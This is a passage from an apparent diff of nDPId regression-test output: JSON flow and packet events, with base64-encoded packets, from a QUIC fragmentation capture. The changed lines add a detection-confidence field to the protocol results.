ImpIKoL9MeHVOS5lygsoTWIqqynPssiNY6xC8pyJX6Ub4BO4F+0CReGOoAESo+zj9+lbUqbeb7h2ZFGxadMW1CyyleoZNnWar6Hz0+sxBH9qRVZU5Heht2DjEc+6NEcDLxV5EaOX94GYWpZ5FR0EacC16CngtIJvVS2Vy4VHEXkHxRQ\/E8+BlBf48jcRRSu6r+V6GHpQVxkfvTm75zRbp227tVm1MAOmDC4ptEOe+sdRM+KrFAvaHe3o8pZCxK\/7aYLbotm\/RZjsivWCu89Cmlg0uVcL6Bo5BPfMomqOupt99ASfgdLdPTXGKZLuwp3GgyZeH9wnyPMM2+7Ggpa0RPG\/l2tSy9nrzzP\/MgL6CqbtRTpr2wbBNd\/SlbwIb1c6hehW1bLPfXoYMcr0kEetxg6OaHbyEdd\/4Ggz4SeyO3GItOwerR7WYWNxOmqs9taE9J\/PhK6NBDsXc5h1tgICSKag9AJoKaM9ovRC5UgfrYrqgqF4SuseIOZvAOlPyRcpmSKooL1mlS9PJzoeolBQ4Q6A6x\/nvmxc72I7syFXnB044YwfE2N774LUPLvvOLCg6Im9ZhCD7p4F+CscFU38oxt25Ays+maqiXnRw3mGV9KfMCfeBg8fWwb36KsISX3CI+1rfMDf89m\/pkzSajfjHt8k3vTCGPK5nVGcTDfOSB9CGZ6SX8cHmOTNUvoBI7fCfE9\/8Ngy8sawBjS5kemk2pVar\/Qjc6ZWFlikqXDEg6gI3HlFx4rzttRuJpbdSVX3pGOgGMXPyrCnFjqgDg3Cu2Y3VVoKD9yvfxYbTeV+segTGzJ9TpKpIQ7l2mOQyzexa60jhCdWRVqP2SmFZC650dD3TPV5qrCw8uvxv\/Hwr9JxUCKr4vZ4MNIS1Qme31hh9cKk\/smw6+dP8LKPbRFjyi5hKalZAn2oi12OsRGCRrT+CZhgIm3EsqKl4eDAmzdpgh\/Xxnln2oigZwNL9aNU0vU6Ri2z6ptRUiK3E+ULse6j5hYRaWYH1k1ExTT3ucG4D4c7xsf3YTntqY+KTDBBG1sDbHwo3em6WCb7WG7xc0voquwvCfNxaCk3bAzckSDEa86uyeuxhABsH12KWz4kITx5OwWU+lhxFgwus9PGlUh3+t363ytP+xsR98JT4AH\/MTUvv9IyRtjule4mQon8WEXtnJYqcNEh5E2UIF8gnaLnV+hrmX90Z\/weVChYKzF3NgPl9LTYOKXHKx6sgO+65G03KKrg6J\/G\/Y28JZ444EBiIz1Vv3DiM9J4DLhOb6iB9GptUjPIDobrRPDlIYVvrbFerCtsjpuaVI\/H1eUosHYVIRS78lDJZULDLtLIu6mDP+sVB"}
-00668{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":86,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":65,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621488172593,"flow_last_seen":1621488172593,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621488172593,"l3_proto":"ip4","src_ip":"159.117.176.124","dst_ip":"208.229.157.81","src_port":58337,"dst_port":443,"l4_proto":"udp","ndpi": {"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {}}
+00694{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":86,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":65,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621488172593,"flow_last_seen":1621488172593,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621488172593,"l3_proto":"ip4","src_ip":"159.117.176.124","dst_ip":"208.229.157.81","src_port":58337,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {}}
 02304{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":87,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":65,"flow_packet_id":2,"flow_last_seen":1621488172891,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"ts_msec":1621488172891,"pkt":"AAAAAAAAAAQA2lQ0CABFAAViZb5AAH4R06OfdbB80OWdUePhAbsFTm8Pzf8AAB0IIYJbjKvcKZMAAEU0+s8UmerPzJNPf2vFFmMIxXzWOI8+nlMJBqPIX91\/fJ41T6FVJdyz55\/AUFcKq9ZZyk2YP1zAlqFolkkHkO3Xi8aifTMn51fKa2wn5Crg\/NezDOPCbLX1Xw15fkvxcQMtx4EhBp9vvHyapMkXhNDJRu9RXfR+jrCal+s6uozM4Bh\/jgsteWhVYvFutpLBcFpAsACOZOXcc76QRT29xwiI2HkTMraeke6E6Elw3fZ8\/x0cjiKmAdvj\/rbQ44niXNogWCExDiid2qXxV\/VGMqrcCQpdoi78teOlLV1cLZCyKK9Gz1YT8+74zc3fizqw3J2xo1b0u2CHknZb06C+uIl7e5NEZUm2WVVu0v4iXHKkXSNY51UoQsVSs9xffcs1c0GmB\/wh2f7GXXXrVNip8rLBByPg2DJfrk+PoxGJ3J1kwQ1qDmOjB+UdN6fAUDfkxumO+fJw5izefocSJigy5LmmrjyewC9W+CDD3xJ\/cFzJCoFgSyf95fZ38+c\/H2rJBuKCVW1pdiho\/NBYDfaWuy5vckCjxN4xZv2JHxLWOVrRbclHG\/W4SWRZQP56mfXat0F0uG7PtJ8CgwXQ7NSbWtihIdZ43Ml3L0hioaK94VzmiCutO2T6s1ZqHQABM0\/PLZwtIpO3lBVHxkmK8czxVU2bfhh8Bd2aiAShWCZbWF5jU8EnQsfhGgHyekqxaLTahPiDCOg0SBmkozlENpi+0yMs2D5IkWhpyqBstkxFFNgybyAV5r6Lhm7JHwq3ZfXZFrRSuhRUAeCOh+NaYs7welFWYGPQBos2AQTRUC3NlRnOAtgvnKyVKOW2QjRgtqEzb4WdTL0bbNQ2FQpc9GYYE\/flJ2uoIFGQuv3JETxQMq9QMyae75gPV\/Bj+xdFH57XdiAsHKWYX7zqDRuKxKMuekYDDstuaLV4VDQc6MVZaJFii0GEv\/SupV\/58ZZpNHFEEyZHJzfkH2tbuh5MUuS5PofLOSzfTRmu+vMjtYQ209SICOmLVwPZ8u2AGrlFW2EqkZfbKI9erViZ2Unn0RZM2Pn+Wgst22Sb5g8wjh4wiA9weFHLORi1vWiHZkYe2\/BL8j1rJOY+xONNiXjbzvs+yXxIs+kJcjMnf6gyaovRvL\/c6j4rDv+KS6KHyF5Hju3yVQObDWEk+4j7PY+PaxYyvjYZHI36l3YksknZbaOMlMvl6nVwtU\/k8ACWq1HuEpfSG1UyrshCoDlTkhmlMZlMD7qdLPEuFj6m4MSRbjzW3hQa\/qxU3T2Qgki9LeSxXGYHJB9FXzq8yIQ0vOgWUQBxW\/4B0BqwQlgEeI27byi7vI9kmpC7Qou2YWyfsYTI9GGARRW7m5xU+maz8hHKd9KDfpthCymON5jJnYSptI3eug5aoGebEfP5bAslTyRCDFlm2Q8uSYfqFoNXujhc5z8WRPjLGKq59LGiZiW\/yB6lByCmmdTIYea2rAoFVqdYtPOdeFLrrKWhD5CpJEWImL1e1iTCT+E807\/aKY4QGP2WsFpn7d+gLCr5xQK6CXuhhNH9slGRzedlepwRyZh\/3i53f2a3Gl9RXi3N64p6CoFGMqiF8smMYblBOriOhOrEkIll8SQrZsnx81mclM\/4eF2UVnsQIp5n07HaGrEdZCT8fSndvbKLHO\/t6xkch5Ixv6BouSjYWklnDUEpJZz+jrQFC2wuRvZqOy6nf4lhu\/4E2kmpv\/MgYvFMVgKwJlJICexzBQbnudDHL7qYGQXGmi1uMwd9ljoVOFUJTpmzZx2wQtELSWXl0AWl"}
 02305{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":88,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":65,"flow_packet_id":3,"flow_last_seen":1621488173506,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"ts_msec":1621488173506,"pkt":"AAAAAAAAAAQA2lQ0CABFAAViZb9AAH4R06KfdbB80OWdUePhAbsFToJhz\/8AAB0IIYJbjKvcKZMAAEU0qqZ2\/TuAubKLOjJ81oMaQxBMQ+\/6Vw7RaaKNzHvrM1NT+orB\/NmJSKxGxbSKEavrqUsSfkdDyIeYu3DeilK2GpCIubh8xfR7tcGDs399cvt3jBHRuuErN+rqniq2AF218asFOb+4ZGYSRPk5EdOKXsHpM4jOO5Xn\/0nKFyhG9EYHqVO8+pB7f6yczQlCMtDLF7lTT1tq0Xx5\/GJD9G0tCnOfX23fuY+en2OxpF0Q0PgXWtcsqYDtzTUWjmLH9BCjSI2kYYeo50ocz2WBWTGUXpoqJ9iYBz24Ky503DT5070a\/wp9cUFkXCNTV2eHv4keTxj9VvDD+Oi66PuHhOmSDrAohpZ0xItBmFaH47riNVmR0f7T0zfIhWCnOcjR4SomjPDBWcliBXMeSR14Qltlyc2kedQT7ZLDVfShl8+u3uS+zP8eyCq9nqBKQBMDF3cRxR6L9pGoibjSnh\/b6YBpwD7F5mcjWWjHHKVaxCEGQReuxjIGxxYeVTuCdqjXIwa0Izsll9LqeaEweLCNX8z\/\/CZA3pA9mivC5xkaqkyX9Ux4LPkC+WULQxMZBpEoE79XgttU5rCxCA8WEYInE4gplnnN12fNrAq7oK+ddinTvJs0+jBDZTCzpU5n0HC2WICnWxzQMAjhLIg\/BIVwHRaFAYw4Do1nKdRZ3+Sk32nhis1tvF4rOVrl8+QuSs+KqMidgjtjP4SWdcX\/X8u2OzpzpdBsJdPiiV1fZ6dss\/sv6xMaQ9B5Gojobr89aeGChzGbohXQd5y+iFUBt1VsbEb5dhDDvDWxob504mm+e8jfdDuh3GB0n6pHxwhoVSFVO0mUera+adQA3\/opY719kwV\/jWZYsfN5slbWhOML1HIQ5QADeewjbYw54FRDTOuqIEIQbZ9eM\/tKlt3HYJQncTGCiHf2mm1doGvuzgFM0BmQfN90m\/alC4XLQIUhU8uiZL5CekhxJSUTgbyaSPP5TKOnCqgDTVfMKVsJwC7ux18\/QNJq+Ao9ADSnhw1UkHTxFxUqNTpfucOEexD48oLEIifV\/GQ5Y7cYnaT6cfEnC0SeITsljquMY3Vr79yR+QT5dEIT2QkhSvvCGGW\/JaK9qcRkCLlnq0aJaQUiowTpWicqExI5X+zS+4f9cimXTb1tdSX+O2UlnWTkunOyyMLCdR06IG83Z2X7B68oZ5TXGb1vA2xmZqHXtvssbw5o3OZ\/M9ztrfZLxtw7s8Pk6oU7LSRvamoE2v0G9pXaI5VrazOyfxbUNSpQmwOmJe459lT4Qg\/CnThmMtCEXTzATibzMPGsrla5NWj1q5gr9q3cviQjSSPHCEIDuTp5wrZMCiLpv2tpEgI1rY246nmnSiDYby74PkSaGM0LCk4dDOKWAhuy+SIWuf9+uyIIqBmolfwWUmGX4ONSUzWAjAWNs2YzUhcxe+89BPXzlrVFcxvo28wdQF4wSVKN2VK78RJt0mrleR\/3P9HW80AETxSMIAaEoEcHDp\/lwJVPxAJL45U914u61nAp6JUN9jjimYNkNOeCLWI6j0GQS0Xi6UYYe2RkTF7sTCWShKI7ICgWwC12IaNxcPgDzh7ZJ5NhRgId1zLe42\/4\/EcfTgM0eAjGVTGUnREGIUVXj90QTn7l3oLmTduz\/OspCcyyktZYIOsHK+50LEMXLZUzKDQljXLHjWdmlr2k+azMseDn\/5zu4+kAWTW9dTENdlnZVBC1XVkmAgizBXmK\/6e5hjHzv+Y\/zyTl7BZXDbv8FjjkJrCJK9tXBh9Xzwcqbagr"}
 00629{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":90,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":65,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1621488172593,"flow_last_seen":1621488174706,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":5400,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621489064431,"l3_proto":"ip4","src_ip":"159.117.176.124","dst_ip":"208.229.157.81","src_port":58337,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00626{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":90,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":66,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621489064431,"flow_last_seen":1621489064431,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621489064431,"l3_proto":"ip4","src_ip":"159.117.176.124","dst_ip":"198.74.29.79","src_port":49867,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02300{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":90,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":66,"flow_packet_id":1,"flow_last_seen":1621489064431,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"ts_msec":1621489064431,"pkt":"AAAAAAAAAAQA8lpWCABFAAViaqxAAH4RWVOfdbB8xkodT8LLAbsFTrHDzf8AAB0IkZSau0whIqIAAEU0rkimartPZo3XhAXpouf99lPyA4vPJfhF3sf1D80fQsd6hKzlDSeSsZ1KyRiDq23Zc4xu7yZSamgh8nd6IyVTF7B8MySKONiiaOY7dBSEC0bp4AebJ3k9Uh+OOZq1GyBDHDSVQ3BCXr14N2BMEqsgITpqPo+Z792Msbma9ODtfxa1MtHVKjQ15xkDF4+So8i\/fjbAfOViRfLKHxw\/jO95gtHmKOmNKHB+nvq+muN+iHIbHDxcpnXnO6PuxaBm23tYOT0PH9TUnUOZWqCNY2p9QM7ZIgufCDLh8c4C\/NFv9tZwBa9qhWLW6ebYQbaildftHqg7LB2KmNDXg69lhWaxLtl4+vEH9U9m2NQrOHQ8oFyTBFFkoewhMmDe5wHcaBJAO22wMqllFBpPnpzOCMy\/DJyHizv1if27VSaBPv3oEozht0\/dit4QAWrhZlnDelbE2T\/59x3uh6ABXgAV0b\/BloP7H5Pv9njEs3lHJOz7dFzr8iIjfB3B+OpQ5iUcuq9FxMhcezvIQOTkxNLORi6FlvB2GNGwRg+rukfVzwMeVbcyJ4bxFt9mc1MOr\/FkhpLL7F3QAjXoJvtrBiJncMoLXPRxAcMFUlowojaTi47EoeY8wguEuf7S86c2o+PQ1edefZeGvN87Fj\/fTTENh3Fn3S0OsYOmjnoXwQbxlBLOKTRd2KGqC3a92N1etrZBlnzvhACTKJeh8oRfYYE4DO+7CgxV4zH9ZFi7iaFktcfGl8Qu0FK6cb5HhSbMXyyvDCuCWYLd0ovyzFo0PNVt6yeC7MWIrgENNxCpTwOvjKs0+xlEsZf\/950lvdpBdkdhcTjSV34d2kg0KiEp6WKDoRhKAAnK2OjPGibxjk5vdFxY91t13JpZ9htdqGGMPDekPyxWc83i1LGMSQbz7QKh0X0aMz5ybK9\/HbZcAK3XSa0dobDV5b7WeSDsU\/3gkn5RaztmQfVs3owjzIYFbp5Buyz0Gxwz5Bi8HAJbB5BGGh\/yrQBy9y6a7q+P1hltskurz6iUjM71in38UzRyZojCOuaO6Q7QJeQvBcY+2qihs0FbDRsgigWTGzfjnSYa0tOUmlOdzI8uCwh7va3320+93h3I3V0faV6zxO50Au9kcqGGOEH12ZgVIt1bQdug2VBjCCj4ZbXJqLVuzhI96SplBcyo6UlwCnd09h5dMNn35qTkIiXou3NlcZ\/tYICl0xnfzAm0RxKz7INWJ+Pl4zSOjW44oFQwywPEE4MnpAbtWWGFRsesYIQtXXRapdS6Ha5rSylQcznied94Fdc28K\/TNM2dGosTNyEVqfCkfy1UU4pXqhmQ0m+rjS5SPefaGM\/ZPD3NALEgC7CILnzOB2B0di286grgHexJhCWlTHpcLt7yvnPnpvNTnwlX\/9e5CoKQXAkJPiDVcfLUGhluxsjbiqi4SZfvmdSRbJceWdtp0X6oS+wZzMuskEDHTOdTm8\/2jfc3WP6WQlIPINuCYViTLdF00mSEreSp+37OaIb2Rx6SPPD3UtpXaQ+xXSYus1Cf40a6k\/5iqSZBv7Fz9wAvqxvY\/FEStzmAQOKL6neOcR\/iuiKWOf9tLN1utG9qzj06bkXuF4PkrZOphQj91RQVjRHJE\/j47Lin6DaH6C5JcxMyymH9ObgTVyLE1e0B+wF06i5Hpk0EmLRJrJjURxyuhfANLHsp16+JhydB5\/grGxYRU3dFEB9114XRsU\/tiaZ2R5k2S89FboGA44VEliJWQ+CTSwLe5S+N2Dr44vXPvjO\/3OWWI7JX"}
-00666{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":90,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":66,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621489064431,"flow_last_seen":1621489064431,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621489064431,"l3_proto":"ip4","src_ip":"159.117.176.124","dst_ip":"198.74.29.79","src_port":49867,"dst_port":443,"l4_proto":"udp","ndpi": {"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {}}
+00692{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":90,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":66,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621489064431,"flow_last_seen":1621489064431,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621489064431,"l3_proto":"ip4","src_ip":"159.117.176.124","dst_ip":"198.74.29.79","src_port":49867,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {}}
 02305{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":91,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":66,"flow_packet_id":2,"flow_last_seen":1621489064732,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"ts_msec":1621489064732,"pkt":"AAAAAAAAAAQA8lpWCABFAAViarFAAH4RWU6fdbB8xkodT8LLAbsFTjgfxP8AAB0IkZSau0whIqIAAEU0J8TFf9\/VN5o0lGBaCguQoO02OQJilvANZtDrj\/OMFT5vVNrKFd7OCVag8EJVYHP5drDglbbDTRTqEryYKQXDwAjbQHCb4hSrdiCPrBiKGUysqjHibjMf\/\/cJtlkKUYMzu1OQDuQUj+9BuGidWSQXbdrGH\/cTlKPd+fyN5rndTfsi2anhztAx+d2YTQRUUekRhlHuVJJ4p2Z3IZFTAhuPV73fTbf4SPuN0fx\/zwW0yXmcrqFwPIt2QCjrijow3wd+KpIs8aCUsVA3tkWMowGKkarLcQuMXYVO22n13\/qzcKOa3k5hzYmf35naphUVFnOiktJs5QiID0Mr11P7nKWISepE\/LKfN5G+AyBbHafEcuSLG+dEVP8yUlkvIWHaglmQ7qizy0zJczKmfUmQ4tB8PkdGBsyVJGxcLh46gJws33Dq2OBt0nxBR63wvgp7Iary4iOfw\/IHL3ToumCAV\/dXmL2kmNgOH8id2nU8Nu+pL\/mFyecOQcSlSIelxqEkydSXxEN6pMAyMNNzbwL5ZSVp2Z7kNaBMx8OxLxM3MyXiXBmtzik8FiHJRBWbOiVcg6x+N7mPue3jU\/huf1f0BbINQqN\/HNFCVwUhYAaElxDE6W\/blagPEW7I+SBFkQnuMpiIU5olOZc0CA8vEyBMs1tdVjOahUyHy8OFPfa4AFVAWJFtweZG3vHwtK+CpbCbe4cAXN1BRfmIH18rN1CiM\/ld5AcYMoezZxV7vyfKJwA1l7ujoHiWN9N\/jrpLAvyVeal7LCBIIi0GZ9vgIHand1Crz4BVQdwhxX\/b1KPjn6A0R2aF+8O+Jk4noYbodAKmJ20EQ4Io4xNA8Y2lH3XGlWsRmrg8HB\/uQwODFlv4Oe\/aBKhU93ernwhJ5dNzrCWsNwJ3ixca321IQXfRagDxTu5nq\/rHSlaGZ8XpC4aiF+vcEUNT+D7buWqgbnGXDaQOWeV3rk3WWi5Xd4DtoiE+O8dxPSi9YsxFNyD+D1Fehvnge1XsEICUGBX1oA1lskHJpGPRUbaLRmjcWs1Ytuy8V8zbWNuhpR2uEU5FpDzQ9GGTEimYVW60syM+GZGoskPJK6zwMlYqVKL\/UK2+O6rkjDClgzO14h8Z6S6YGxcY4LhXA72k3F5H8sKLJMFB83CXn2nMGIYAKuT65vFY41aaqklz9NsRxW1YBg0jNa3ymere9qj2lEhOIgrb7GB+XkUkMf0QieDkM8pJSkzEXOFBLZfPAV3fLw3lZfe4s\/jN60uQMrcR88C9EnpOiOrBFZez0skinInExnzYEDkAtavtIsdoE71PRyR\/dHDCqzg7kZ18pLX6NjwVvyB1mlpdkMAVY1EdaRaeNmWPl40RA41HKTHrY+z6mtyrQLn5TgQXvZRMN76xUYz7ayMs5reGKxJhMrZqb6\/bIMRHi82Y4BJdVJJZgwj+sPhMg05o\/ukkRyzckGw\/OsW0tpPkLGLflVUuMWwcW3Yl7XXY9H4D+Gmk\/VQnSB5ldiKMcQlD5Nr524IdDK7HSP8PT17bN\/G71L8W4XQgg51GSgKjOUAB9S83oxZySOQTS0wV5NhNyS88WD5F0B8ngP\/B8chV5QevsF0LoPzzLZXg0AbR9bUfORgjfQ6jPb0UprPbX1e+36tDhCQ10Uh7j1e0kar55VVOgvNSJPW81uGBYWlpARxFyZgAbqvJ88OllqvEawT8k4\/1yAtxNXmYu6a0+vmPKpdv2NvRgtdznnjM6OaQG9AT9KHeWFinQcr3EhoXjjHZtcq2EfJF249Ule5A"}
 02305{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":92,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":66,"flow_packet_id":3,"flow_last_seen":1621489065332,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"ts_msec":1621489065332,"pkt":"AAAAAAAAAAQA8lpWCABFAAViarJAAH4RWU2fdbB8xkodT8LLAbsFTtRNzv8AAB0IkZSau0whIqIAAEU0tHfQYGgiJ0EH+RA73c0S6Zaq1R3\/CGoDzOwk4Q2KioTg4BPcXvMoegRpbrqCRaxPmqcY6POupt419T5yZmEB9o7YSIZtOKX53fGHCoc+ZsrZdAJTsVl0w90+Thu9tqk+WfepCoo+8ilF8eq+j6cYmQaoShwWbEH8aZWTDkaSoT09anmUbwmDVwEeDWMR2gVSbwwmv8rsQebDMqWs7OSh8srBRRpctj4tlSjdyXtQ\/UgrcQwLwZyJ9bsybxKQkPWcl8u0HzyojquwKL+JbZxKDXk1Pg7nHqmE0nKgm9VkdPudXzUwchL1ul3yO2j+uSSY2ucW6GJUzkbRuqcP05vN5\/18Mzh2lL9RaX2a5vbWSDbJPjG6on5UXS4AETy2nWNq1houkm3\/LsJAcFW+eybNMQ\/Nfc0orOQRsfJQyw7lxDL1ruzcECMi7m7+OPIDmAbmjAnyDrsC8setxlXVl5I8lkK9C2ve4qxQY7LHppOIbgqzCnXt9B18rSw2ymRIIb8dQ+M\/fx31qrhwE34LRBtwaOzL55FerimrdvtRhPE\/mv7IoDWsrrCajTyJVFlMWr2531Fxhp0DlBKapCIN6irm6NF41QYx7pEPTpaVM2SwERSQzVfsZROIRwvaACW8\/+fvwocDLWcyiM5VOq9hyWHb9QLQTSulOzEVAVmrwaA2Wc5frvDv0rMsW9gHUGuvWJwN9Krts73QCPZYA\/f1SV1AyEmPiYreXLu3MGFoUmEo\/LyVkXE4N1kExgUBnVeYUIGJRQKjBWutqE8sov37uQgss39hXvDSnclvpRoBNdSz2aaNs3R6Aic7VKt8gbyykfOIBA3Buq8zDmawY8YFdP1SsTa6np4zbntI9f+oNNrBriSQ14fbXVlNMQrhk1OYGIYbeXglU4ZIOKm77PLC2GR7SRTn1H4t2671bYr4eyrorlhGkzYuX1PeGMw\/j85u5uLrj61e2hEZJZD7r5x8MTQ1gOe4+Ph+Kz9X1vjFbsw9OmMDWkO65Ha+Cpf1ZHHApZ7QAuo5u2mG4Sp7g6rR1s5uclM6hCCnn2k2s8EDrb6RtHFjg3BneIS6SwSXyliDMHw0gO1PbIdSx1UUpSePV\/pCILKC\/M0H5LpPf\/59YwKN2B63+JAG1sL\/t2nutXsHIQzTGfUGp8q\/gu8\/oH2Pcsu\/oR96zl2VAWRwNCHmnnaZF9GJ22T7FDvnout2BFKs7xALVK\/GSWUrWW0DnJStDl6qSbXs+mlUPlFGuHBk4Eke31rEr4AxfQ2a\/9mZZog+0PD59WqfTjJ9R8bXy1KhNrHv56NiIqBiUw0rbG\/82hMaedg4sCu\/NdJjPtKJFvSXUMukKueAgyWcPj4sSLpvlA7iCI4ka\/RTTiki4Ye4QcJaaU15gJVIwcMMNnbkXWv\/HhOCwgK6cReevf96zzpUj1c84N8PWt9IEX6REFpHkIe9y3OvWTzdASwXJ9ovv1G9SjXfvrI7XedRdAxpB2vsQYi5gwEy3zTb3EFTDheiNc9y\/MCzHpVCklw85aHzUyvlzbZikqniVBAqAJensYNeu3p1TfbVsgAsy2eW\/hv+DDPc5Am8kV01z+FVZJbVWMPq0+tF6tPJo+fDG6\/w2\/eu949hx2pjfKmhp3d5IX0vfNEJhDKZIgmFV4d0I2S35UzYShoVcEpOEWvsBojm\/XwBtXsjwpE570c8CRHk7pLygTlIjRIrEQN0O6eP3A7nIZP\/sV9waxu2fmgOUmfKn8+KMxaVZv4SRaTB7ghieqbWD5Y61rshpqaP"}
 00627{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":94,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":66,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1621489064431,"flow_last_seen":1621489066532,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":5400,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621490937698,"l3_proto":"ip4","src_ip":"159.117.176.124","dst_ip":"198.74.29.79","src_port":49867,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00625{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":94,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":67,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621490937698,"flow_last_seen":1621490937698,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621490937698,"l3_proto":"ip4","src_ip":"52.187.20.175","dst_ip":"118.89.218.46","src_port":58123,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02298{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":94,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":67,"flow_packet_id":1,"flow_last_seen":1621490937698,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"ts_msec":1621490937698,"pkt":"AAAAAAAAAAQAxdZsCABFAAViDl1AAH4RTzw0uxSvdlnaLuMLAbsFThsNyv8AAB0Is32f4l9Pl3YAAEU0hQvFkzqCFRJrzdm+P7CepRPizYj8V5fWvrVXzVuBf2NRkl3eGWbs2YtmOjlr1x\/pBPc\/7TLqG34Khp0PMlFKcz3fdNeoXKYeyR\/Hs72zcRs4hnEn+4P6mPqm5uCsv8fDjYHuJRIAjvSHTbEdxqgFHEd93118utoyjtMgpgcEbs4fXoPb8uDAHM5T4MCKj6qQNjX6I7nNo6EuPNWQg9gu3uCawN9k7BQzQN6E5YfL1AdHh4udF7sZw+dow9sF\/laxj49FS3UXGVaahEsCE3aD2597p7TwOCMsaP9cpJ6+mt4daKLcDJnJAMt+icMAtT9fzWBRO4vYi5NQjh2DPs+GRWiTKh8dxvVzhRom8\/iF8KHgTJy3pWtXKlPeLfZAL3oZX5hiz2PB+HTVur2l5vjVWa6EpaFOaRykdvEuLIieDh5u0ZCT5hWtho28j2TyUwsZurEURzu6rl34H7da+I6rfvvL\/zNBXRl0T5rIEnMLL\/j4r9tphU2zm73BBkXS2V8NqavgjXhm8kqC3c5AZmhcVx3aPVo+42Q3ezUT39SU